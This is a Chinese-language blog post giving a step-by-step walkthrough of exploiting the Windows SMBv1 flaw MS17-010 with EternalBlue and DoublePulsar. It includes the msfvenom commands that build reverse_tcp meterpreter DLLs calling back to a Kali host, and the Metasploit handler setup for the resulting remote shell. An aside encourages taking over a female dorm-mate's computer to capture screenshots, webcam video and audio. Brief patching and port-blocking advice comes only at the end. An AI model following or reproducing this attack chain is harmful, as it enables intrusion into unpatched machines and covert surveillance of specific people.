微软EternalBlue永恒之蓝漏洞攻击测试

作者: 一点也不想吃辣 | 来源:发表于2017-05-03 22:20 被阅读1837次

    声明:仅供学习交流使用,个人实验笔记。排版比较懒。

    微软MS17-010
    理论:SMBv1 漏洞攻击,445端口。

    环境准备:

    攻击资源:攻击工具包 点我
    攻击者系统:Windows 7 Ultimate (x64) 点我
    受害者系统:Windows 7 Ultimate (x64) 点我,winXP,win2008,win2003均可。 点我
    辅助攻击用系统:kali 点我
    推荐虚拟环境构建工具:vmware workstation或oracle Vbox工具下载

    操作:

    1、攻击者环境部署(确保路径全英文):
    虚拟机部署win7 64位环境,要么都桥接,要么都选择自定义网络。
    下载python2.6并安装点我
    下载pywin32并安装,一定要注意,下载对应python版本点我
    将C:\Python26添加到环境变量PATH中。
    将攻击工具包拖入虚拟机,或上传到虚拟机。解压后,里面有个Windows的目录,复制出来到虚拟机的c盘。
    新建 listeningposts 目录。

    2、受害者环境部署:

    受害者系统自选一个就行,随意,安装后,需要和攻击者系统能互相ping通。

    3、攻击操作:

    攻击者在cmd下运行fb.py
    target IP就是受害者IP
    callbackIP就是攻击者的IP
    USE redirection输入NO
    base log 输入 c:\logs或输入NO(是否有日志记录,这个是自愿)
    接着输入0,新建了一个攻击项目。
    项目名称随意(英文以外名字可能会报错)。
    然后输入yes确认
    其他的直接回车就行了。英文可以用有道翻译。
    use EternalBlue
    问你是否要setting。输入yes
    下面的回车就好,都是默认好的配置。
    target system,如实选择受害者的系统。
    mode选择fb,即输入1。
    剩下的就是yes和回车了。
    当出现success关键词的时候,说明攻击第一步已经完成了。
    (失败的原因:
    1、防火墙的保护。
    2、杀毒程序的保护。
    3、网络通信异常。
    4、人为操作失误。)
    

    部署辅助攻击系统:

    1、部署kali,可以和攻击者正常通信即可。
    2、攻击者安装xshell。
    3、通过xshell ssh到kali即可。(百度关键词,kali开启和配置ssh服务)
    4、利用kali 的msf生成后门文件。(LPORT端口参数随意,只要不冲突就行)
    如果受害者是winXP 32位:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali系统的ip LPORT=19999 -f dll > /tmp/attack.dll
    如果受害者是win7 64位:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=5555 -f dll > /tmp/attack.dll
    确认xshell已经连接到了kali,
    在xshell输入:sz /opt/attack.dll 
    选择保存在攻击者系统的c盘根目录下即可。
    xshell下:
    msfconsole
    use exploit/multi/handler //启用了监听模块
    受害者是winXP的时候:
    ( set payload windows/meterpreter/reverse_tcp
    set LHOST kali的ip
    set LPORT  19999  
    show options  //看一眼配置
    run //开启了监听
    )
    受害者是win7 64位时:
    (
    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost kali的ip
    msf exploit(handler) > set lport 5555
    msf exploit(handler) > exploit
    )
    
    在攻击者的cmd下:
    use Doublepulsar
    操作系统选择目标的。
    选择RunDLL
    路径输入:c:\attack.dll
    其他各种回车确认。
    可以看到,xshell连接的kali,收到了会话连接。
    可以输入whoami或者dir来验证一下。
    

    其他资源(感觉部署环境好麻烦,想来点现成的):

    在线现成的环境操作实战:点我在线实战
    kali下直接实现攻击利用:http://www.jianshu.com/p/f770d0bbed77

    杂谈

    一般情况,女生的电脑如果和你在一个网络,比如你们宿舍之间,没有做严格的隔离,那么,理论上讲,可以完整的控制她的电脑,除非她安装了360,为何不说她安装了腾讯管家。因为,对付一些漏洞,需要足够的浪才可以,管家还是太文绉绉了。
    (不仅可以截屏,还可以看摄像头,还有录音。另:现网实战前,请阅读:https://www.ishuo.cn/doc/mzlpnnqf.html

    预防和其他参考:

    360提供了懒人模式的NSA攻击自动检测和防护工具,免安装。点我
    使用防火墙过滤/关闭 137、139、445端口。
    对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。
    安装微软补丁:请前往微软官方网站下载与自己操作系统匹配的安全补丁进行更新
    MS08-067:https://technet.microsoft.com/zh-cn/library/security/ms08-067.aspx
    MS09-050:https://technet.microsoft.com/library/security/ms09-050
    MS10-061:https://technet.microsoft.com/zh-cn/library/security/ms10-061.aspx
    MS14-068:https://technet.microsoft.com/library/security/MS14-068
    MS17-010:https://technet.microsoft.com/zh-cn/library/security/MS17-010

    相关文章

      网友评论

      本文标题:微软EternalBlue永恒之蓝漏洞攻击测试

      本文链接:https://www.haomeiwen.com/subject/scmltxtx.html